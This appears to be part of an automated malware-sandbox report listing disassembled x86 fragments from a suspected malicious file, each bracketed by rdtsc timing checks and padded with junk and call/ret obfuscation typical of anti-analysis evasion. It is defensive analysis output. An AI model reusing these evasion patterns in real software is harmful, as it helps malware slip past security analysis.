Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F37B3 second address: 11F37F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007F07913FD839h 0x0000000c mov edx, dword ptr [ebp+122D2FC7h] 0x00000012 push 00000000h 0x00000014 and edi, dword ptr [ebp+122D2B3Bh] 0x0000001a push 4603DE40h 0x0000001f push eax 0x00000020 push edx 0x00000021 jno 00007F07913FD828h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F37F0 second address: 11F387B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0790DC9726h 0x00000009 jp 00007F0790DC9726h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 4603DEC0h 0x00000019 jnp 00007F0790DC972Ch 0x0000001f jmp 00007F0790DC9735h 0x00000024 push 00000003h 0x00000026 cmc 0x00000027 mov edx, dword ptr [ebp+122D338Ch] 0x0000002d push 00000000h 0x0000002f mov cx, di 0x00000032 push 00000003h 0x00000034 add dword ptr [ebp+122D1E51h], edx 0x0000003a pushad 0x0000003b jmp 00007F0790DC9734h 0x00000040 mov dword ptr [ebp+122D1F8Ch], ecx 0x00000046 popad 0x00000047 call 00007F0790DC9729h 0x0000004c jmp 00007F0790DC9730h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push ebx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F387B second address: 11F3880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F3880 second address: 11F3886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F3886 second address: 11F389C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0790D59B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F389C second address: 11F38B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop edi 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F0790DC9728h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F38B2 second address: 11F38D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D59B5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F0790D59B58h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11F38D3 second address: 11F38D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F38D8 second address: 11F3945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0790D59B56h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F0790D59B58h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push ecx 0x00000029 pop edx 0x0000002a lea ebx, dword ptr [ebp+12455593h] 0x00000030 mov esi, dword ptr [ebp+122D2A9Bh] 0x00000036 mov esi, dword ptr [ebp+122D2BB3h] 0x0000003c xchg eax, ebx 0x0000003d jg 00007F0790D59B6Ch 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F0790D59B5Dh 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3945 second address: 11F3956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790DC972Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3956 second address: 11F395B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3A2A second address: 11F3AF7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnl 00007F0790DC973Ah 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jnc 00007F0790DC9739h 0x0000001a pop eax 0x0000001b mov dword ptr [ebp+122D3312h], ecx 0x00000021 push 00000003h 0x00000023 push esi 0x00000024 movsx ecx, di 0x00000027 pop ecx 0x00000028 push 00000000h 0x0000002a mov edx, dword ptr [ebp+122D2A7Bh] 0x00000030 movsx esi, di 0x00000033 push 00000003h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007F0790DC9728h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D2C03h] 0x00000055 stc 0x00000056 call 00007F0790DC9729h 0x0000005b pushad 0x0000005c push esi 0x0000005d jnl 00007F0790DC9726h 0x00000063 pop esi 0x00000064 jmp 00007F0790DC9738h 0x00000069 popad 0x0000006a push eax 0x0000006b jg 00007F0790DC9736h 0x00000071 mov eax, dword ptr [esp+04h] 0x00000075 push edi 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3AF7 second address: 11F3B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edi 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F0790D59B5Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3B0B second address: 11F3B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3B0F second address: 11F3B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007F0790D59B62h 0x00000013 pop eax 0x00000014 or dword ptr [ebp+122D1F8Ch], ebx 0x0000001a lea ebx, dword ptr [ebp+1245559Eh] 0x00000020 mov esi, 45357885h 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3B47 second address: 11F3B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3B4B second address: 11F3B55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1205982 second address: 1205987 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214B37 second address: 1214B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0790D59B63h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D654E second address: 11D6554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212BBA second address: 1212BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212BC0 second address: 1212BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F0790DC9738h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 jc 00007F0790DC9726h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212EA3 second address: 1212EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212EA7 second address: 1212EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0790DC9726h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212EB3 second address: 1212EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121318F second address: 12131A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F0790DC972Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121360D second address: 121362E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0790D59B68h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121362E second address: 1213632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1213632 second address: 1213648 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D59B62h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1213648 second address: 121364E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1209C89 second address: 1209C8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1209C8F second address: 1209C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1209C95 second address: 1209CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnp 00007F0790D59B5Eh 0x00000011 jo 00007F0790D59B5Eh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7FA8 second address: 11D7FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7FAE second address: 11D7FB9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121423B second address: 1214247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214247 second address: 121424B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121424B second address: 121424F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1209CAA second address: 1209CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0790D59B5Eh 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1218514 second address: 121851A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1218793 second address: 1218798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9D1 second address: 121A9D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9D9 second address: 121A9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12209BC second address: 12209C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0790DC9726h 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12209C7 second address: 12209D6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0790D59B58h 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121FFB2 second address: 121FFB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122055D second address: 122057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 jp 00007F0790D59B56h 0x0000000e jmp 00007F0790D59B5Ah 0x00000013 pop ebx 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122057C second address: 1220580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220711 second address: 1220717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1220717 second address: 122071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122309D second address: 12230A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0790D59B56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12232B4 second address: 12232CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F0790DC9726h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12233D4 second address: 12233D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12233D9 second address: 12233F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0790DC9731h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223A7A second address: 1223A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223E19 second address: 1223E23 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0790DC972Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223F47 second address: 1223F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1224030 second address: 122404A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0790DC9735h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122404A second address: 12240B5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F0790D59B58h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 pushad 0x00000026 sub dword ptr [ebp+122D34A4h], edx 0x0000002c jmp 00007F0790D59B64h 0x00000031 popad 0x00000032 movsx esi, ax 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jnp 00007F0790D59B69h 0x0000003e jmp 00007F0790D59B63h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12274FC second address: 1227506 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0790DC9726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1227506 second address: 122755B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0790D59B5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D28BDh] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F0790D59B58h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d sub si, C9F5h 0x00000032 push 00000000h 0x00000034 jmp 00007F0790D59B5Ah 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jne 00007F0790D59B58h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228A1E second address: 1228A28 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0790DC972Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228A28 second address: 1228A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jc 00007F0790D59B56h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1228A3A second address: 1228A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122ACCC second address: 122AD4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0790D59B69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007F0790D59B5Ah 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F0790D59B58h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D375Dh] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F0790D59B58h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d push 00000000h 0x0000004f xor edi, dword ptr [ebp+122D1AA9h] 0x00000055 xchg eax, esi 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 push esi 0x0000005a pop esi 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229B8A second address: 1229B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1229B96 second address: 1229B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AEA5 second address: 122AEBD instructions: 0x00000000 rdtsc 0x00000002 je 00007F0790DC9726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0790DC972Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BD58 second address: 122BD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BD5C second address: 122BD62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BD62 second address: 122BDF0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0790D59B6Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F0790D59B56h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F0790D59B58h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 jmp 00007F0790D59B68h 0x00000035 push edx 0x00000036 jc 00007F0790D59B56h 0x0000003c pop edi 0x0000003d push 00000000h 0x0000003f mov bh, ch 0x00000041 push 00000000h 0x00000043 mov di, 9971h 0x00000047 xchg eax, esi 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b jmp 00007F0790D59B5Ah 0x00000050 jnp 00007F0790D59B56h 0x00000056 popad 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122AF8B second address: 122AF95 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0790DC9726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122CE34 second address: 122CEAE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F0790D59B58h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 je 00007F0790D59B57h 0x00000028 cmc 0x00000029 push 00000000h 0x0000002b xor bx, BB04h 0x00000030 push 00000000h 0x00000032 add edi, dword ptr [ebp+122D1844h] 0x00000038 xchg eax, esi 0x00000039 je 00007F0790D59B6Fh 0x0000003f jno 00007F0790D59B69h 0x00000045 push eax 0x00000046 pushad 0x00000047 push ebx 0x00000048 push eax 0x00000049 pop eax 0x0000004a pop ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F0790D59B61h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122BF81 second address: 122BF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122F34F second address: 122F3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F0790D59B58h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov bx, E01Ch 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F0790D59B58h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 sub di, C65Fh 0x0000004a xchg eax, esi 0x0000004b pushad 0x0000004c push edx 0x0000004d push edx 0x0000004e pop edx 0x0000004f pop edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F0790D59B67h 0x00000057 rdtsc
